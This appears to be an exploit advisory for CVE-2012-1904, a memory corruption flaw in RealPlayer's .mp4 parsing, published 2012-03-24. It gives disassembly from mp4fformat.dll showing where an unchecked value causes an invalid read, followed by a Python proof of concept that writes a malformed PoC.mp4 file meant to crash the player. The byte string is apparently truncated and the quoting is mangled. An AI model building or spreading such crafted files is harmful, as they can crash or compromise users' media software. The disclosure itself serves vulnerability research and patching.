RealPlayer .mp4 File Handling Memory Corruption Exploit

Summary

RealPlayer .mp4 file handling suffers from memory corruption vulnerability

Credit:

The information has been provided by Julien Ahrens.
The information has been provided by Senator of Pirates.


Details

Vulnerable Systems:
 * RealPlayer .mp4 file handling

Memory corruption during the handling of the MP4 files, sub_61177240 this function is read some values from file so this point can be vulnerable because of not checking the values.

>From mp4fformat.dll :

61177240 55 PUSH EBP
61177241 8BEC MOV EBP,ESP
61177243 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C]
61177246 85C9 TEST ECX,ECX ; ECX = 00000001
61177248 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; EAX is Pointer to values
6117724B 74 22 JE SHORT mp4fform.6117726F ; The jump is not Take
6117724D 56 PUSH ESI
6117724E 8BFF MOV EDI,EDI
61177250 0FB670 02 MOVZX ESI,BYTE PTR DS:[EAX+2]
61177254 33D2 XOR EDX,EDX
61177256 8A30 MOV DH,BYTE PTR DS:[EAX]
61177258 8A50 01 MOV DL,BYTE PTR DS:[EAX+1]
6117725B C1E2 08 SHL EDX,8
6117725E 0BD6 OR EDX,ESI
61177260 0FB670 03 MOVZX ESI,BYTE PTR DS:[EAX+3]
61177264 C1E2 08 SHL EDX,8
61177267 0BD6 OR EDX,ESI
61177269 03C2 ADD EAX,EDX
6117726B 49 DEC ECX
6117726C ^75 E2 JNZ SHORT mp4fform.61177250
6117726E 5E POP ESI
6117726F 5D POP EBP
61177270 C2 0800 RETN 8

61177FE9 8B4E 24 MOV ECX,DWORD PTR DS:[ESI+24]
61177FEC 33D2 XOR EDX,EDX
61177FEE 8946 08 MOV DWORD PTR DS:[ESI+8],EAX
61177FF1 8A70 0E MOV DH,BYTE PTR DS:[EAX+E] ; invalid address our program will crash
61177FF4 8A50 0F MOV DL,BYTE PTR DS:[EAX+F]

############################################################################################################
Code :
——
PoC = (‘x00x00x00x1Cx66x74x79x70x6Dx70x34x32x00x00x00x00x69x73x6Fx6Dx61x76x63x31x6Dx70x34x32x00x01x19x28x6Dx6Fx6Fx76x00x00x00x6Cx6Dx76x68x64x00x00x00x00xC7x21xFCx5BxC7x21xFCx5Bx00x00x02x58x00x02x22xA8x00x01x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x03x00x00x00x15x69x6Fx64x73x00x00x00x00x10x07x00x4FxFFxFFx29x15xFFx00x00xA5xE5x74x72x61x6Bx00x00x00x5Cx74x6Bx68x64x00x00x00x01xC7x21xFCx5BxC7x21xFCx5Bx00x00x00x01x00x00x00x00x00x02x22x9Cx00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00

payload = (PoC)
f = open(‘PoC.mp4′,’wb’)
f.write(payload)
f.close()

CVE Information:
2012-1904

Disclosure Timeline:
Published: 2012-03-24

Categories: Exploits